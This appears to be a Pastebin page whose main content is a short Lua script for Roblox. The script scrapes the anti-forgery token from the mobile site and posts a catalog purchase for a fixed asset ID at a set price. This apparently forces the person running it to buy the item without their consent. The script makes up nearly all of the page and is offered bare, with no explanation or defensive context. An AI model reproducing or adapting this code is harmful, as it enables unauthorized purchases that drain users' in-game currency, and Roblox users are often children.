Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local aid, ct, uaoi, ep = 82561142, 1, 0, 250
- local g=function(fr,p,v,r)
- c=game:HttpGet('http://m.roblox.com/home', true)
- rvt=c:match('<input name="__RequestVerificationToken" type="hidden" value="(.-)">'):match('(.-)" />')
- print(('__RequestVerificationToken=' .. rvt .. '&CurrencyType=' .. ct .. '&AssetID=' .. aid .. '&UserAssetOptionID=' .. uaoi .. '&ExpectedPrice=' .. ep))
- game:HttpPost('http://m.roblox.com/Catalog/ProcessPurchase', '__RequestVerificationToken=' .. rvt .. '&CurrencyType=' .. ct .. '&AssetID=' .. aid .. '&UserAssetOptionID=' .. uaoi .. '&ExpectedPrice=' .. ep, true, 'application/x-www-form-urlencoded; charset=UTF-8')
- end
- g()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement